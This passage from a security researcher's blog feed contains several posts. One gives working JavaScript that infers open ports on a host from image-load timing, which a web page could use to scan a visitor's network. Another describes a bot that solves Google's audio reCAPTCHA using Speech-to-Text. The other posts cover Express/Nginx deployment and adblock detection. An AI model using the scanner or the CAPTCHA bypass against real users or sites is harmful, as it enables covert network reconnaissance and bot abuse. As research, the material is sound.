borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
ticks: {
reverse: false
}
}]
}
}
}
var ctx = document.getElementById('chromeImageNginx').getContext('2d');
new Chart(ctx, options);
</script>
<p>But what happens when the scanned service (open port) is not a HTTP server? What if it is, lets say a unrelated TCP service?
This time, we will simply use <code>netcat</code> to simulate an arbitrary TCP service. There is no response from <code>netcat</code> on any incoming message.</p>
<p>We use the command <code>ncat -l 4444 --keep-open --exec "/bin/cat"</code> to launch a simple TCP echo server.</p>
<canvas id="netcatExample" width="600" height="400"></canvas>
<script>
var options = {
type: 'line',
data: {
labels: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],
datasets: [
{
label: 'Open Port Timings',
data: [9.94,5.955,6.285,5.495,9.68,5.665,6.715,9.57,9.135,6.835,6.165,6.18,5.21,5.64,5.415,5.065,5.465,5.21,5.265,13.48,6.78,6.855,5.25,7.405,5.435,4.93,5.695,5.125,5.77,4.93],
borderWidth: 1,
borderColor: 'rgba(255, 0, 0, 0.3)',
},
{
label: 'Closed Port Timings',
data: [4.805,4.255,4.055,7.98,4.07,4.31,3.75,3.67,4.775,4.385,4.165,4.51,3.73,3.825,3.925,3.82,4,6.3,3.765,5.615,5.59,4.18,3.855,5.805,5.155,8.605,3.65,3.815,3.72,4.325],
borderWidth: 1,
borderColor: 'rgba(0, 255, 0, 0.3)',
}
]
},
options: {
scales: {
yAxes: [{
ticks: {
reverse: false
}
}]
}
}
}
var ctx = document.getElementById('netcatExample').getContext('2d');
new Chart(ctx, options);
</script>
<h3>Conclusion</h3>
<p>As the plots above demonstrate, it does not matter if the scanned service is a toy HTTP server, real HTTP server (nginx) or any TCP service (netcat), we can see that the measured timings are significantly longer on open services!</p>
<h3>Full Algorithm to Determine if a Port is open or not</h3>
<p>Now we have enough information to design an algorithm that makes an very educated guess if a port is open or not.</p>
<p>Our algorithm is very very simple:</p>
<p>We want to determine if port <code>p</code> is open or not.</p>
<p>We take <code>N=30</code> measurements of port <code>p</code> and <code>N=30</code> measurements of a port <code>q</code> that is very likely closed (lets say port <code>q = 37857</code>).</p>
<p>If</p>
<ol>
<li>80% of all measurements of <code>p</code> are larger than <code>q</code> measurements</li>
<li>And if the sum of all measurements of <code>p</code> are at least <strong>1.3</strong> times larger than <code>q</code> measurements</li>
</ol>
<p>we consider the port <code>p</code> to be open.</p>
<p>Of course our assumption is that <code>q</code> is closed ;)</p>
<p>The full code is as follows:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// Author: Nikolai Tschacher</span>
<span class="c1">// tested on Chrome v86 on Ubuntu 18.04</span>
<span class="kd">var</span> <span class="nx">portIsOpen</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">hostToScan</span><span class="p">,</span> <span class="nx">portToScan</span><span class="p">,</span> <span class="nx">N</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">portIsOpen</span> <span class="o">=</span> <span class="s1">'unknown'</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">timePortImage</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">port</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">t0</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span>
<span class="c1">// a random appendix to the URL to prevent caching</span>
<span class="kd">var</span> <span class="nx">random</span> <span class="o">=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">random</span><span class="p">().</span><span class="nx">toString</span><span class="p">().</span><span class="nx">replace</span><span class="p">(</span><span class="s1">'0.'</span><span class="p">,</span> <span class="s1">''</span><span class="p">).</span><span class="nx">slice</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="mf">7</span><span class="p">)</span>
<span class="kd">var</span> <span class="nx">img</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">Image</span><span class="p">;</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">elapsed</span> <span class="o">=</span> <span class="p">(</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">t0</span><span class="p">)</span>
<span class="c1">// close the socket before we return</span>
<span class="nx">resolve</span><span class="p">(</span><span class="nb">parseFloat</span><span class="p">(</span><span class="nx">elapsed</span><span class="p">.</span><span class="nx">toFixed</span><span class="p">(</span><span class="mf">3</span><span class="p">)))</span>
<span class="p">}</span>
<span class="nx">img</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="s2">"http://"</span> <span class="o">+</span> <span class="nx">hostToScan</span> <span class="o">+</span> <span class="s2">":"</span> <span class="o">+</span> <span class="nx">port</span> <span class="o">+</span> <span class="s1">'/'</span> <span class="o">+</span> <span class="nx">random</span> <span class="o">+</span> <span class="s1">'.png'</span>
<span class="p">})</span>
<span class="p">}</span>
<span class="kd">const</span> <span class="nx">portClosed</span> <span class="o">=</span> <span class="mf">37857</span><span class="p">;</span> <span class="c1">// let's hope it's closed :D</span>
<span class="p">(</span><span class="k">async</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">timingsOpen</span> <span class="o">=</span> <span class="p">[];</span>
<span class="kd">var</span> <span class="nx">timingsClosed</span> <span class="o">=</span> <span class="p">[];</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><</span> <span class="nx">N</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">timingsOpen</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="k">await</span> <span class="nx">timePortImage</span><span class="p">(</span><span class="nx">portToScan</span><span class="p">))</span>
<span class="nx">timingsClosed</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="k">await</span> <span class="nx">timePortImage</span><span class="p">(</span><span class="nx">portClosed</span><span class="p">))</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">sum</span> <span class="o">=</span> <span class="p">(</span><span class="nx">arr</span><span class="p">)</span> <span class="p">=></span> <span class="nx">arr</span><span class="p">.</span><span class="nx">reduce</span><span class="p">((</span><span class="nx">a</span><span class="p">,</span> <span class="nx">b</span><span class="p">)</span> <span class="p">=></span> <span class="nx">a</span> <span class="o">+</span> <span class="nx">b</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">sumOpen</span> <span class="o">=</span> <span class="nx">sum</span><span class="p">(</span><span class="nx">timingsOpen</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">sumClosed</span> <span class="o">=</span> <span class="nx">sum</span><span class="p">(</span><span class="nx">timingsClosed</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">test1</span> <span class="o">=</span> <span class="nx">sumOpen</span> <span class="o">>=</span> <span class="p">(</span><span class="nx">sumClosed</span> <span class="o">*</span> <span class="mf">1.3</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">test2</span> <span class="o">=</span> <span class="kc">false</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">m</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mf">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o"><=</span> <span class="nx">N</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">timingsOpen</span><span class="p">[</span><span class="nx">i</span><span class="p">]</span> <span class="o">></span> <span class="nx">timingsClosed</span><span class="p">[</span><span class="nx">i</span><span class="p">])</span> <span class="p">{</span>
<span class="nx">m</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1">// 80% of timings of open port must be larger than closed ports</span>
<span class="nx">test2</span> <span class="o">=</span> <span class="p">(</span><span class="nx">m</span> <span class="o">>=</span> <span class="nb">Math</span><span class="p">.</span><span class="nx">floor</span><span class="p">(</span><span class="mf">0.8</span> <span class="o">*</span> <span class="nx">N</span><span class="p">));</span>
<span class="nx">portIsOpen</span> <span class="o">=</span> <span class="nx">test1</span> <span class="o">&&</span> <span class="nx">test2</span><span class="p">;</span>
<span class="nx">resolve</span><span class="p">([</span><span class="nx">portIsOpen</span><span class="p">,</span> <span class="nx">m</span><span class="p">,</span> <span class="nx">sumOpen</span><span class="p">,</span> <span class="nx">sumClosed</span><span class="p">]);</span>
<span class="p">})();</span>
<span class="p">});</span>
<span class="p">}</span>
<span class="c1">// how to use</span>
<span class="nx">portIsOpen</span><span class="p">(</span><span class="s1">'localhost'</span><span class="p">,</span> <span class="mf">8888</span><span class="p">,</span> <span class="mf">30</span><span class="p">).</span><span class="nx">then</span><span class="p">((</span><span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">let</span> <span class="p">[</span><span class="nx">isOpen</span><span class="p">,</span> <span class="nx">m</span><span class="p">,</span> <span class="nx">sumOpen</span><span class="p">,</span> <span class="nx">sumClosed</span><span class="p">]</span> <span class="o">=</span> <span class="nx">res</span><span class="p">;</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="s1">'Is localhost:8888 open? '</span> <span class="o">+</span> <span class="nx">isOpen</span><span class="p">);</span>
<span class="p">})</span>
</code></pre></div>Breaking the Google Audio reCAPTCHA with Google's own Speech to Text API2021-01-02T19:16:00+01:002021-01-05T18:45:00+01:00Nikolai Tschachertag:incolumitas.com,2021-01-02:/2021/01/02/breaking-audio-recaptcha-with-googles-own-speech-to-text-api/<p>In this project, I make use of a method from early 2019 that demonstrates how to solve the Audio reCAPTCHA with Google's own Speech to Text API. This method still works, which is quite astonishing.</p><h3>Video Demonstration and Explanation</h3>
<p>In the YouTube video below, I explain the technical details behind solving the Google Audio reCAPTCHA. I even make some remarks about philosophical implications when AI is becoming smarter than humans in certain fields. I am in no way qualified to talk about such matters though ;)</p>
<div class="embed-youtube" style="margin-bottom: 30px">
<iframe width="750" height="563" src="https://www.youtube.com/embed/1kBmbEwJpYo" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
</div>
<div><a class="btn" style="width: 240px" href="https://github.com/NikolaiT/uncaptcha3">Link to GitHub repository</a></div>
<h3>Introduction</h3>
<p>This blog article uses the fantastic research from the authors of <a href="https://github.com/ecthros/uncaptcha2">uncaptcha2 repository</a>. The original <a href="https://uncaptcha.cs.umd.edu/papers/uncaptcha_woot17.pdf">scientific uncaptcha paper</a> proposes a method to solves Google's Audio reCAPTCHA with Google's own Speech-to-Text API.</p>
<p>Yes you read that correctly: <strong>It is possible to solve the Audio version of reCAPTCHA v2 with Google's own <a href="https://cloud.google.com/speech-to-text">Speech-to-Text API</a>.</strong></p>
<p>Even worse: reCAPTCHA v2 is still used in the <a href="https://developers.google.com/recaptcha/docs/v3">new reCAPTCHA v3</a> as a fall-back mechanism.</p>
<figure>
<img class="smallimg" src="https://incolumitas.com/images/homer.webp" alt="Home being Homer" />
<figcaption>No description needed. <span style="font-size: 60%">(Source: https://i.giphy.com/media/xT5LMzIK1AdZJ4cYW4/giphy.webp)</span></figcaption>
</figure>
<p>Since the release of <a href="https://github.com/ecthros/uncaptcha2">uncaptcha2</a> is from <strong>Janunary 18, 2019</strong>,
their Proof of Concept code does not work anymore (as the authors predicted correctly).</p>
<p>This blog post attempts to keep the proof of concept up to date and working.</p>
<h3>How does it work?</h3>
<p>Everyone knows and hates reCAPTCHA. It looks like this:</p>
<figure>
<img class="smallimg" src="https://incolumitas.com/images/ReCaptcha.png" alt="ReCaptcha" />
<figcaption>The reCAPTCHA we all love</figcaption>
</figure>
<p>For the inclusion of visually impaired people, there is also an audio version of reCAPTCHA.</p>
<figure>
<img class="smallimg" src="https://incolumitas.com/images/AudioReCaptcha.png" alt="AudioReCaptcha" />
<figcaption>The audio version. <a href="https://incolumitas.com/images/audioReCaptcha.mp3">This is how it sounds</a></figcaption>
</figure>
<p>The idea of the attack is very simple: You grab the mp3 file of the audio reCAPTCHA and you submit it to Google's own Speech to Text API.</p>
<p><strong>Google will return the correct answer in over 97% (* Edit: 91%] of all cases.</strong></p>
<p>* The figure 91% comes from the original <a href="https://github.com/ecthros/uncaptcha2">uncaptcha2</a> repository. I have not run statistical significant tests with the current bot, but based on intuition, it seems to be more than 90% when you rotate IP addresses and browser fingerprints.</p>
<h3>Proof of Concept</h3>
<p>All mouse movements are done by the bot. Movements are randomized to some degree.</p>
<div class="embed-youtube">
<iframe width="750" height="563" src="https://www.youtube.com/embed/xh145UIeN9M" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
</div>
<h3>Conclusion</h3>
<p>We do live in astonishing times.</p>Deploy an Express App with Nginx and forward real IP Address2020-12-31T14:48:00+01:002020-12-31T14:48:00+01:00Nikolai Tschachertag:incolumitas.com,2020-12-31:/2020/12/31/express-with-nginx-and-forward-real-ip-address/<p>In this tutorial it is demonstrated how an Express App is deployed with Nginx as reverse proxy. Static files are served with Nginx and the real IP address is forwarded to the Express app.</p><p><a href="https://expressjs.com/">Express</a> is probably one of the widely used web frameworks out there. It is incredibly easy to use and extremely powerful. <a href="http://nginx.org/">Nginx</a> is one of the most popular web servers and is often used as a reverse proxy. Nginx is super fast and powerful, making it one of the go-to choices when deploying web servers.</p>
<p>In this blog article it is shown how an Express application can be deployed with Nginx as a reverse proxy. The following common problems will be solved:</p>
<ol>
<li>How to forward the remote IP address of a client to the web app from Nginx</li>
<li>How to serve static files with Nginx</li>
<li>Bonus: Deploy SSL certificates with <a href="https://letsencrypt.org/">Let's Encrypt</a></li>
</ol>
<p>You can follow each step along in this tutorial.</p>
<p>Important: It is assumed that every step in this tutorial is made on a VPS server that is publicly accessable from the Internet.
To be specific, an Ubuntu 18.04 Linux server is used. The instructions should be identical with Ubuntu 20.04.</p>
<h3>Setting up the project</h3>
<p>You need to have <a href="https://www.digitalocean.com/community/tutorials/how-to-install-node-js-on-ubuntu-18-04">Node.js and npm installed</a>.</p>
<p>Create the project directory and change into it.</p>
<div class="highlight"><pre><span></span><code>mkdir express-with-nginx
cd express-with-nginx/
</code></pre></div>
<p>Install express:</p>
<div class="highlight"><pre><span></span><code>npm install express
</code></pre></div>
<p>And then save the following server code as <code>server.js</code>:</p>
<div class="highlight"><pre><span></span><code><span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s1">'express'</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nx">express</span><span class="p">();</span>
<span class="kd">const</span> <span class="nx">port</span> <span class="o">=</span> <span class="mf">3000</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">getIp</span><span class="p">(</span><span class="nx">req</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">let</span> <span class="nx">ip</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">connection</span><span class="p">.</span><span class="nx">remoteAddress</span><span class="p">;</span>
<span class="nx">ip</span> <span class="o">=</span> <span class="nx">ip</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="s1">'::ffff:'</span><span class="p">,</span> <span class="s1">''</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">ip</span> <span class="o">==</span> <span class="s1">'127.0.0.1'</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">ip</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">headers</span><span class="p">[</span><span class="s1">'x-real-ip'</span><span class="p">];</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">ip</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">get</span><span class="p">(</span><span class="s1">'/'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">res</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="s1">'Hello World from: '</span> <span class="o">+</span> <span class="nx">getIp</span><span class="p">(</span><span class="nx">req</span><span class="p">));</span>
<span class="p">})</span>
<span class="nx">app</span><span class="p">.</span><span class="nx">listen</span><span class="p">(</span><span class="nx">port</span><span class="p">,</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="sb">`Example app listening at http://localhost:</span><span class="si">${</span><span class="nx">port</span><span class="si">}</span><span class="sb">`</span><span class="p">);</span>
<span class="p">})</span>
</code></pre></div>
<p>Now you have a functional express server.</p>
<p>Start the server with the command:</p>
<div class="highlight"><pre><span></span><code>node server.js
</code></pre></div>
<h3>Configure Nginx</h3>
<p>The next step is to setup Nginx as a reverse proxy.</p>
<p>Create the Nginx configuration file in <code>/etc/nginx/sites-available/express_nginx.conf</code>:</p>
<div class="highlight"><pre><span></span><code># /etc/nginx/sites-available/express_nginx.conf
server {
listen 80;
server_name test.incolumitas.com;
location / {
proxy_pass http://localhost:3000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_cache_bypass $http_upgrade;
}
}
</code></pre></div>
<p>Please change the domain name <strong>test.incolumitas.com</strong> to whatever domain you are using.</p>
<p>Note: The directive <code>proxy_pass</code> tells Nginx to forward all traffic arriving on <code>test.incolumitas.com</code> to the local server listening on <code>http://localhost:3000</code>.</p>
<p>The directive <code>proxy_set_header X-Real-IP $remote_addr;</code> forwards the real IP address of the user in a header <code>X-Real-IP</code> to our Express application.</p>
<p>Enable the Nginx configuration file with the command:</p>
<div class="highlight"><pre><span></span><code>ln -s /etc/nginx/sites-available/express_nginx.conf /etc/nginx/sites-enabled/
</code></pre></div>
<p>And then restart the server:</p>
<div class="highlight"><pre><span></span><code>service nginx restart
</code></pre></div>
<p>Now visit the URL <a href="http://test.incolumitas.com">http://test.incolumitas.com</a> with your browser. You should see something like this in your browser: </p>
<div class="highlight"><pre><span></span><code>Hello World from: 145.54.78.22
</code></pre></div>
<h3>Deploy an SSL certificate with Let's Encrypt</h3>
<p>In a real production environment, you should of course deploy the webserver with SSL support. This tutorial shows how to do so with <a href="https://www.digitalocean.com/community/tutorials/how-to-secure-nginx-with-let-s-encrypt-on-ubuntu-18-04">Ubuntu and Nginx and Let's Encrypt</a>.</p>
<p>Assuming that <code>certbot</code> is correctly installed, you can issue the following command to use SSL:</p>
<div class="highlight"><pre><span></span><code>certbot --nginx -d test.incolumitas.com
</code></pre></div>
<p>You will see the following output. Choose the option <strong>2: Redirect</strong> when prompted.</p>
<div class="highlight"><pre><span></span><code>Saving debug log to /var/log/letsencrypt/letsencrypt.log
Plugins selected: Authenticator nginx, Installer nginx
Obtaining a new certificate
Performing the following challenges:
http-01 challenge for test.incolumitas.com
Waiting for verification...
Cleaning up challenges
Deploying Certificate to VirtualHost /etc/nginx/sites-enabled/express_nginx.conf
Please choose whether or not to redirect HTTP traffic to HTTPS, removing HTTP access.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
1: No redirect - Make no further changes to the webserver configuration.
2: Redirect - Make all requests redirect to secure HTTPS access. Choose this for
new sites, or if you're confident your site works on HTTPS. You can undo this
change by editing your web server's configuration.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Select the appropriate number [1-2] then [enter] (press 'c' to cancel): 2
Redirecting all traffic on port 80 to ssl in /etc/nginx/sites-enabled/express_nginx.conf
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Congratulations! You have successfully enabled https://test.incolumitas.com
You should test your configuration at:
https://www.ssllabs.com/ssltest/analyze.html?d=test.incolumitas.com
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
</code></pre></div>
<p>Then restart the nginx server with</p>
<div class="highlight"><pre><span></span><code>service nginx restart
</code></pre></div>
<p>You can now access your Express application with the URL <a href="http://test.incolumitas.com">https://test.incolumitas.com</a>.</p>
<p>This will modify your Nginx configuration file to use an SSL certificate. After the command, it will look something like this:</p>
<div class="highlight"><pre><span></span><code>server {
server_name test.incolumitas.com;
location / {
proxy_pass http://localhost:3000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_cache_bypass $http_upgrade;
}
listen 443 ssl; # managed by Certbot
ssl_certificate /etc/letsencrypt/live/test.incolumitas.com/fullchain.pem; # managed by Certbot
ssl_certificate_key /etc/letsencrypt/live/test.incolumitas.com/privkey.pem; # managed by Certbot
include /etc/letsencrypt/options-ssl-nginx.conf; # managed by Certbot
ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; # managed by Certbot
}
server {
if ($host = test.incolumitas.com) {
return 301 https://$host$request_uri;
} # managed by Certbot
listen 80;
server_name test.incolumitas.com;
return 404; # managed by Certbot
}
</code></pre></div>Detecting uBlock Origin and Adblock Plus with JavaScript only2020-12-27T20:47:00+01:002022-11-25T22:31:00+01:00Nikolai Tschachertag:incolumitas.com,2020-12-27:/2020/12/27/detecting-uBlock-Origin-and-Adblock-Plus-with-JavaScript-only/<p>There are many resources in the Internet that show how to detect uBlock Origin and Adblock Plus. However, after some research, it became clear that most detection methods are unreliable and cease to exist after a while. In this blog article, a reliable detection method for uBlock Origin and Adblock Plus is demonstrated. No external libraries. Just plain and simple JavaScript.</p><p><strong>Edit (25th November 2022):</strong></p>
<p><a href="https://github.com/easylist/easylist/issues/14102">My blog got listed on EasyList</a></p>
<p>Therefore, I had to remove all AdBlock baiting JavaScripts from this blog. This means that the AdBlock Detection on this blog <strong>no longer works</strong>.</p>
<p>I am sorry I can not longer offer AdBlock detection here. I still think that it is valid for publishers to know whether clients are blocking ads. Publishing content is hard work and should be rewarded in some form. Intrusive ads are annoying, I get why clients are blocking them. But there is some middle ground I guess.</p>
<hr>
<ul>
<li><a href="https://github.com/NikolaiT/adblock-detect-javascript-only">For the code, visit the GitHub page of this article</a></li>
<li>Alternatively, install the Adblock detection script <a href="https://www.npmjs.com/package/adblock-detect-javascript-only">from npm</a> with the command <code>npm i adblock-detect-javascript-only</code></li>
</ul>
<p>In case this will stop working in the next days / weeks, I will make the selection of filter dynamic and random. Put differently: If you whitelist a filter such as <code>pp34.js?sv=</code> (uBlock Origin) or <code>&ad_height=</code> (EasyList - uBlock Origin and Adblock Plus), I will make a random selection of a filter / list entry in the following block-lists:</p>
<ul>
<li>Adblock EasyList: <a href="https://github.com/easylist/easylist/blob/master/easylist/easylist_general_block.txt">https://github.com/easylist/easylist/blob/master/easylist/easylist_general_block.txt</a></li>
<li>uBlock Origin uAssets: <a href="https://github.com/uBlockOrigin/uAssets/blob/master/filters/filters-2022.txt">https://github.com/uBlockOrigin/uAssets/blob/master/filters/filters-2022.txt</a></li>
</ul>
<script type="text/javascript">
/**
* Author: Nikolai Tschacher
* Updated: 6th November 2022
* Website: https://incolumitas.com/
*
* Detects uBlock Origin, Adblock Plus and AdBlocker Ultimate with JavaScript only.
*
* Usage: detectAdblock().then((res) => { console.log(res) });
*
*/
function detectAdblock() {
const adblockTests = {
// https://github.com/uBlockOrigin/uAssets/blob/master/filters/filters-2022.txt
uBlockOrigin: {
url: 'https://incolumitas.com/data/yzfdmoan.js',
id: '837jlaBksSjd9jh',
},
// https://github.com/easylist/easylist/blob/master/easylist/easylist_general_block.txt
adblockPlus: {
url: 'https://incolumitas.com/data/utep_ad.js',
id: 'hfuBadsf3hFAk',
},
};
function canLoadRemoteScript(obj) {
return new Promise(function (resolve, reject) {
var script = document.createElement('script');
script.onload = function () {
if (document.getElementById(obj.id)) {
resolve(false);
} else {
resolve(true);
}
}
script.onerror = function () {
resolve(true);
}
script.src = obj.url;
document.body.appendChild(script);
});
}
return new Promise(function (resolve, reject) {
let promises = [
canLoadRemoteScript(adblockTests.uBlockOrigin),
canLoadRemoteScript(adblockTests.adblockPlus),
];
Promise.all(promises).then((results) => {
resolve({
uBlockOrigin: results[0],
adblockPlus: results[1],
usingAdblock: (results[0] === true) || (results[1] === true),
});
}).catch((err) => {
reject(err);
});
});
}
detectAdblock().then((res) => {
var ublockEl = document.getElementById('ublock_origin');
var adblockEl = document.getElementById('adblock_plus');
if (res.uBlockOrigin) {
ublockEl.innerHTML = 'You are using uBlock Origin!';
} else {
ublockEl.style.backgroundColor = '#63ff85';
ublockEl.innerHTML = 'You are not using uBlock Origin';
}
if (res.adblockPlus) {
adblockEl.innerHTML = 'You are using Adblock Plus / AdBlocker Ultimate!';
} else {
adblockEl.style.backgroundColor = '#63ff85';
adblockEl.innerHTML = 'You are not using Adblock Plus';
}
});
</script>
<p><strong>Adblock Plus Detected:</strong> <span id="adblock_plus" style="border: 3px #4f4f4f solid;
padding: 10px;
background-color: #ff6363;
margin-top: 20px;
display: block;
width: 300px;"></span></p>
<p><strong>uBlock Origin Detected:</strong> <span id="ublock_origin" style="border: 3px #4f4f4f solid;
padding: 10px;
background-color: #ff6363;
margin-top: 10px;
display: block;
width: 300px;"></span></p>
<h3>Update Adblock / uBlock Origin Detection on August 27th 2022</h3>
<p>This is the <strong>newest</strong> detection code:</p>
<div class="highlight"><pre><span></span><code><span class="cm">/**</span>
<span class="cm"> * Author: Nikolai Tschacher</span>
<span class="cm"> * Updated: 6th November 2022</span>
<span class="cm"> * Website: https://incolumitas.com/</span>
<span class="cm"> * </span>
<span class="cm"> * Detects uBlock Origin, Adblock Plus and AdBlocker Ultimate with JavaScript only.</span>
<span class="cm"> * </span>
<span class="cm"> * Usage: detectAdblock().then((res) => { console.log(res) });</span>
<span class="cm"> * </span>
<span class="cm"> */</span>
<span class="kd">function</span> <span class="nx">detectAdblock</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">adblockTests</span> <span class="o">=</span> <span class="p">{</span>
<span class="c1">// https://github.com/uBlockOrigin/uAssets/blob/master/filters/filters-2022.txt</span>
<span class="nx">uBlockOrigin</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">url</span><span class="o">:</span> <span class="s1">'https://incolumitas.com/data/yzfdmoan.js'</span><span class="p">,</span>
<span class="nx">id</span><span class="o">:</span> <span class="s1">'837jlaBksSjd9jh'</span><span class="p">,</span>
<span class="p">},</span>
<span class="c1">// https://github.com/easylist/easylist/blob/master/easylist/easylist_general_block.txt</span>
<span class="nx">adblockPlus</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">url</span><span class="o">:</span> <span class="s1">'https://incolumitas.com/data/utep_ad.js'</span><span class="p">,</span>
<span class="nx">id</span><span class="o">:</span> <span class="s1">'hfuBadsf3hFAk'</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">};</span>
<span class="kd">function</span> <span class="nx">canLoadRemoteScript</span><span class="p">(</span><span class="nx">obj</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="ow">new</span> <span class="nb">Promise</span><span class="p">(</span><span class="kd">function</span> <span class="p">(</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">script</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="s1">'script'</span><span class="p">);</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">onload</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="nx">obj</span><span class="p">.</span><span class="nx">id</span><span class="p">))</span> <span class="p">{</span>
<span class="nx">resolve</span><span class="p">(</span><span class="kc">false</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="nx">resolve</span><span class="p">(</span><span class="kc">true</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">onerror</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="nx">resolve</span><span class="p">(</span><span class="kc">true</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">script</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="nx">obj</span><span class="p">.</span><span class="nx">url</span><span class="p">;</span>
<span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">script</span><span class="p">);</span>
<span class="p">});</span>
<span class="p">}</span>
